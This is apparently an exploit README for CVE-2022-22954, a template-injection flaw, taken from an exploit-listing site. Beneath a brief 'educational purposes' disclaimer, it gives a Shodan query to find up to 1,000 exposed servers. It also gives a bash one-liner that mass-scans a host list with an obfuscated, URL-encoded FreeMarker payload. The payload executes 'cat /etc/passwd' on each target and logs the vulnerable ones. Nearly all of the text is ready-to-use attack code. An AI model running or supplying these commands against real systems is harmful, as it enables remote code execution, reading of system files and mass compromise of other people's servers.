Share
## https://sploitus.com/exploit?id=49594F88-14A4-5CA9-9202-ABE72435019C
# CVE-2022-22954

## Attention
> Please use this at your own risk. This repo is meant only for educational purposes and we are strictly against all illegal intentions and we would not be responsible of any illegal activities associated with this repo. Be ethical!

## Example
```
python3 CVE-2022-22954.py -t target.com
python3 CVE-2022-22954.py -t 10.10.10.10
```

## Shodan Query
```
shodan search "http.favicon.hash:-1250474341" --limit 1000
```

## Bash one liner
```bash
cat list_vm_one.txt | awk '{print $1":"$2}'  > vm_one.txt
cat vm_one.txt | while read host do;do curl --max-time 2 --silent --path-as-is --insecure "$host/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" | grep "root:*" && echo "$host [Vulnerable]" >> vuln_vm_one_ssti.txt;done
```